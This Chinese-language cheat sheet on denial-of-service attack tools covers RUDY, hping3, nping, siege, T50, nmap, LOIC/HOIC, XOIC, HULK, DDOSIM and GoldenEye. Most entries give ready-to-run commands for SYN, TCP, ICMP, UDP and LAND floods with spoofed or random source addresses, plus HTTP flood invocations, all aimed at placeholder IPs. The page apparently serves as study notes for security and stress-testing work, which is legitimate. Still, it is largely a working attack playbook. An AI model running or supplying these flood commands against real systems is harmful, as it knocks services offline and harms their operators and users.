拒绝服务攻击工具

RUDY(Are You Dead Yet?)

  • 慢速应用层HTTP POST攻击,与slowhttptest原理相同
  • 每次只传输一个字节的数据
  • 攻击有表单WEB页面,攻击时需指定攻击的参数名称
  • https://sourceforge.net/projects/r-u-dead-yet/
  • 美剧“黑客军团”中提到此攻击手段
  • 必须是POST请求,页面中必须要有表单

Hping3

  • 几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试

  • Syn Flood攻击

    • hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
    • hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
  • TCP Flood攻击

    • hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1
  • ICMP Flood攻击

    • hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
  • UDP Flood攻击

    • hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
  • LAND攻击

    • 源地址和目的地址都是受害者,受害者与自己完成三次握手,或者不同端口相互循环应答。
    • hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
  • 参数:

    • -a 伪造源地址
    • -s 源端口
    • -d 数据段字节
    • -p 目标端口

Nping

  • nmap 的组件之一

  • TCP全连接DoS攻击

    • nping --tcp-connect --rate=10000 -c 10000000000 -q 1.1.1.1
  • 查公网IP

    • nping --echo-client "public" echo.nmap.org --udp
      • 传“public”字符到echo.nmap.org,会返回自己的公网IP

Siege

  • http/https 压力测试工具,模拟多个用户并发访问请求

  • siege -g http://1.1.1.1/a.php / 1.1.1.1

  • siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp

  • 同时攻击多个url,使用-f调用字典文件

    • /etc/siege/urls.txt
  • 参数:

    • -i:三种方式之一,internet
    • -A:UserAgent
    • -c:并发用户数

T50

  • 网络压力测试

  • t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80

  • t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 80


Nmap

  • grep dos /usr/share/nmap/script/script.db|cut -d "\" -f 2

  • nmap -p445 --script=xxxx 1.1.1.1


匿名者发布的DoS工具

  • LOIC
  • HOIC
  • DDoSer
  • 招募志愿者,发放以上工具
  • 以上DoS工具不隐藏真实IP地址

XOIC

  • 攻击任意IP地址的指定端口
  • github
  • 三种模式:test、normal、DoS Attack
  • 支持协议:TCP/HTTP/UDP/ICMP

HULK(Http Unbearable Load King)

  • Python脚本
  • 随机产生大量唯一的地址请求,避免缓存命中
  • 耗尽WEB服务器资源池

DDOSIM

  • 7层拒绝服务工具(模拟多个僵尸机)
  • 随机IP地址
  • 基于TCP连接的攻击
  • 应用层DDoS攻击
  • 正常的HTTP请求、非正常的HTTP请求式DDoS
  • SMTP DDoS
  • 随机端口的TCP连接洪水

GoldenEye

  • http/https拒绝服务攻击工具
  • 安全研究为目的的Python脚本
  • 随机攻击向量,keep-alive,避免缓存命中
  • ./goldeneye.py http://1.1.1.1 -w 50